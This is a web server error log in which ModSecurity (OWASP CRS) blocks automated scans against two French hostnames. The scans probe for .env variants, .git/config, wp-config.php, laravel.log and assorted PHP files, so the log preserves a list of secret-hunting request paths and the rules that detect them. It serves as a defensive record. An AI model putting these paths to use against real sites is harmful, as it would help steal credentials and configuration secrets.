[Mon May 11 22:42:52.521612 2026] [security2:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /new-wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/new-wp-config.php"] [unique_id "agI_TB2Cvzd_nyNfUm8EdgAAAQ4"]
[Mon May 11 22:42:52.521764 2026] [security2:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/new-wp-config.php"] [unique_id "agI_TB2Cvzd_nyNfUm8EdgAAAQ4"]
[Mon May 11 22:42:52.521984 2026] [security2:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/new-wp-config.php"] [unique_id "agI_TB2Cvzd_nyNfUm8EdgAAAQ4"]
[Mon May 11 22:42:52.617524 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/env-info.php
[Mon May 11 22:42:52.713340 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/moderator.php
[Mon May 11 22:42:52.834299 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/23.php
[Mon May 11 22:42:53.125032 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/summary.php
[Mon May 11 22:42:53.229149 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/globals.php
[Mon May 11 22:42:53.347506 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/evil.php
[Mon May 11 22:43:08.332840 2026] [security2:error] [pid 1590352:tid 1590410] [client 5.255.126.76:33750] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "test.rentparadise.fr"] [uri "/.git/config"] [unique_id "agI_XK1q0G_aXAqWauQARQAAAJI"]
[Mon May 11 22:43:08.333891 2026] [security2:error] [pid 1590352:tid 1590410] [client 5.255.126.76:33750] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "test.rentparadise.fr"] [uri "/.git/config"] [unique_id "agI_XK1q0G_aXAqWauQARQAAAJI"]
[Mon May 11 22:43:08.334974 2026] [security2:error] [pid 1590352:tid 1590410] [client 5.255.126.76:33750] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "test.rentparadise.fr"] [uri "/.git/config"] [unique_id "agI_XK1q0G_aXAqWauQARQAAAJI"]
[Mon May 11 22:43:08.507893 2026] [security2:error] [pid 1534836:tid 1534881] [client 5.255.126.76:33880] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "test.rentparadise.fr"] [uri "/.env.local"] [unique_id "agI_XNeaRXe5lR8y0ZO62wAAAUo"]
[Mon May 11 22:43:08.508132 2026] [security2:error] [pid 1534836:tid 1534881] [client 5.255.126.76:33880] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "test.rentparadise.fr"] [uri "/.env.local"] [unique_id "agI_XNeaRXe5lR8y0ZO62wAAAUo"]
[Mon May 11 22:43:08.508693 2026] [security2:error] [pid 1605480:tid 1605528] [client 5.255.126.76:33848] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "test.rentparadise.fr"] [uri "/.env"] [unique_id "agI_XB2Cvzd_nyNfUm8ElQAAAQY"]
[Mon May 11 22:43:08.508866 2026] [security2:error] [pid 1605480:tid 1605528] [client 5.255.126.76:33848] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "test.rentparadise.fr"] [uri "/.env"] [unique_id "agI_XB2Cvzd_nyNfUm8ElQAAAQY"]
[Mon May 11 22:43:08.508913 2026] [security2:error] [pid 1534836:tid 1534881] [client 5.255.126.76:33880] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "test.rentparadise.fr"] [uri "/.env.local"] [unique_id "agI_XNeaRXe5lR8y0ZO62wAAAUo"]
[Mon May 11 22:43:08.508576 2026] [security2:error] [pid 1588898:tid 1588909] [client 5.255.126.76:33936] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "test.rentparadise.fr"] [uri "/.env.old"] [unique_id "agI_XKFW67LJTsgN3jQRKwAAAAo"]
[Mon May 11 22:43:08.509131 2026] [security2:error] [pid 1606352:tid 1606442] [client 5.255.126.76:34002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "test.rentparadise.fr"] [uri "/public/.env"] [unique_id "agI_XHo_DFxNSZVmaX3WjgAAANc"]
[Mon May 11 22:43:08.509354 2026] [security2:error] [pid 1605480:tid 1605528] [client 5.255.126.76:33848] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "test.rentparadise.fr"] [uri "/.env"] [unique_id "agI_XB2Cvzd_nyNfUm8ElQAAAQY"]
[Mon May 11 22:43:08.509382 2026] [security2:error] [pid 1588898:tid 1588909] [client 5.255.126.76:33936] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "test.rentparadise.fr"] [uri "/.env.old"] [unique_id "agI_XKFW67LJTsgN3jQRKwAAAAo"]
[Mon May 11 22:43:08.509605 2026] [security2:error] [pid 1588898:tid 1588909] [client 5.255.126.76:33936] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "test.rentparadise.fr"] [uri "/.env.old"] [unique_id "agI_XKFW67LJTsgN3jQRKwAAAAo"]
[Mon May 11 22:43:08.509575 2026] [security2:error] [pid 1601130:tid 1601165] [client 5.255.126.76:33972] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "test.rentparadise.fr"] [uri "/api/.env"] [unique_id "agI_XHEgAO_835W6c1mb8QAAAE8"]
[Mon May 11 22:43:08.510421 2026] [security2:error] [pid 1601130:tid 1601165] [client 5.255.126.76:33972] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "test.rentparadise.fr"] [uri "/api/.env"] [unique_id "agI_XHEgAO_835W6c1mb8QAAAE8"]
[Mon May 11 22:43:08.515481 2026] [security2:error] [pid 1606352:tid 1606442] [client 5.255.126.76:34002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "test.rentparadise.fr"] [uri "/public/.env"] [unique_id "agI_XHo_DFxNSZVmaX3WjgAAANc"]
[Mon May 11 22:43:08.517060 2026] [security2:error] [pid 1601130:tid 1601165] [client 5.255.126.76:33972] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "test.rentparadise.fr"] [uri "/api/.env"] [unique_id "agI_XHEgAO_835W6c1mb8QAAAE8"]
[Mon May 11 22:43:08.517590 2026] [security2:error] [pid 1606352:tid 1606442] [client 5.255.126.76:34002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "test.rentparadise.fr"] [uri "/public/.env"] [unique_id "agI_XHo_DFxNSZVmaX3WjgAAANc"]
[Mon May 11 22:43:08.583201 2026] [security2:error] [pid 1588898:tid 1588921] [client 5.255.126.76:33812] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "test.rentparadise.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agI_XKFW67LJTsgN3jQRLAAAABc"]
[Mon May 11 22:43:08.584131 2026] [security2:error] [pid 1588898:tid 1588921] [client 5.255.126.76:33812] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "test.rentparadise.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agI_XKFW67LJTsgN3jQRLAAAABc"]
[Mon May 11 22:43:08.587912 2026] [security2:error] [pid 1588898:tid 1588921] [client 5.255.126.76:33812] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "test.rentparadise.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agI_XKFW67LJTsgN3jQRLAAAABc"]
[Mon May 11 22:43:08.823105 2026] [security2:error] [pid 1601130:tid 1601161] [client 5.255.126.76:33912] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "test.rentparadise.fr"] [uri "/.env.backup"] [unique_id "agI_XHEgAO_835W6c1mb8wAAAEs"]
[Mon May 11 22:43:08.823934 2026] [security2:error] [pid 1601130:tid 1601161] [client 5.255.126.76:33912] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "test.rentparadise.fr"] [uri "/.env.backup"] [unique_id "agI_XHEgAO_835W6c1mb8wAAAEs"]
[Mon May 11 22:43:08.825178 2026] [security2:error] [pid 1601130:tid 1601161] [client 5.255.126.76:33912] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "test.rentparadise.fr"] [uri "/.env.backup"] [unique_id "agI_XHEgAO_835W6c1mb8wAAAEs"]
[Mon May 11 22:43:08.829711 2026] [security2:error] [pid 1605480:tid 1605537] [client 5.255.126.76:33980] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "test.rentparadise.fr"] [uri "/admin/.env"] [unique_id "agI_XB2Cvzd_nyNfUm8ElwAAAQ8"]
[Mon May 11 22:43:08.832909 2026] [security2:error] [pid 1606352:tid 1606437] [client 5.255.126.76:33896] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "test.rentparadise.fr"] [uri "/.env.development"] [unique_id "agI_XHo_DFxNSZVmaX3WjwAAANI"]
[Mon May 11 22:43:08.835719 2026] [security2:error] [pid 1606352:tid 1606437] [client 5.255.126.76:33896] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "test.rentparadise.fr"] [uri "/.env.development"] [unique_id "agI_XHo_DFxNSZVmaX3WjwAAANI"]
[Mon May 11 22:43:08.838091 2026] [security2:error] [pid 1605480:tid 1605537] [client 5.255.126.76:33980] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "test.rentparadise.fr"] [uri "/admin/.env"] [unique_id "agI_XB2Cvzd_nyNfUm8ElwAAAQ8"]
[Mon May 11 22:43:08.852572 2026] [security2:error] [pid 1605480:tid 1605537] [client 5.255.126.76:33980] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "test.rentparadise.fr"] [uri "/admin/.env"] [unique_id "agI_XB2Cvzd_nyNfUm8ElwAAAQ8"]
[Mon May 11 22:43:08.852618 2026] [security2:error] [pid 1606352:tid 1606437] [client 5.255.126.76:33896] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "test.rentparadise.fr"] [uri "/.env.development"] [unique_id "agI_XHo_DFxNSZVmaX3WjwAAANI"]
[Mon May 11 22:43:08.913536 2026] [security2:error] [pid 1534836:tid 1534881] [client 5.255.126.76:33880] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "test.rentparadise.fr"] [uri "/.env.staging"] [unique_id "agI_XNeaRXe5lR8y0ZO63QAAAUo"]
[Mon May 11 22:43:08.913716 2026] [security2:error] [pid 1534836:tid 1534881] [client 5.255.126.76:33880] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "test.rentparadise.fr"] [uri "/.env.staging"] [unique_id "agI_XNeaRXe5lR8y0ZO63QAAAUo"]
[Mon May 11 22:43:08.913931 2026] [security2:error] [pid 1534836:tid 1534881] [client 5.255.126.76:33880] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "test.rentparadise.fr"] [uri "/.env.staging"] [unique_id "agI_XNeaRXe5lR8y0ZO63QAAAUo"]
[Mon May 11 22:43:08.914150 2026] [security2:error] [pid 1588898:tid 1588909] [client 5.255.126.76:33936] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "test.rentparadise.fr"] [uri "/.env.example"] [unique_id "agI_XKFW67LJTsgN3jQRLQAAAAo"]
[Mon May 11 22:43:08.914337 2026] [security2:error] [pid 1588898:tid 1588909] [client 5.255.126.76:33936] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "test.rentparadise.fr"] [uri "/.env.example"] [unique_id "agI_XKFW67LJTsgN3jQRLQAAAAo"]
